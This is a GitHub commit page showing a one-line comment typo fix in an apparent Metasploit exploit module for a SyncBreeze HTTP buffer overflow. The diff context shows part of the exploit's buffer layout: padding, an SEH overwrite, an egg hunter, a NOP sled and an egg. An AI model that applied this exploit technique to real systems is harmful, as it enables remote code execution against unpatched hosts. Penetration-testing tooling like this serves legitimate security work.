Skip to content

Commit 488f27b

Browse files
committed
Small Typo
1 parent e6c4fb1 commit 488f27b

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

modules/exploits/windows/http/syncbreeze_bof.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -184,7 +184,7 @@ def exploit
184184
sploit << rand_text_alpha(target['Offset'] - payload.encoded.length, payload_badchars)
185185
sploit << generate_seh_record(target.ret)
186186
sploit << hunter
187-
# Push the payload out of this buffer, which will make the hunger look for the payload
187+
# Push the payload out of this buffer, which will make the hunter look for the payload
188188
# somewhere else that has the complete payload.
189189
sploit << make_nops(200)
190190
sploit << egg

0 commit comments

Comments
 (0)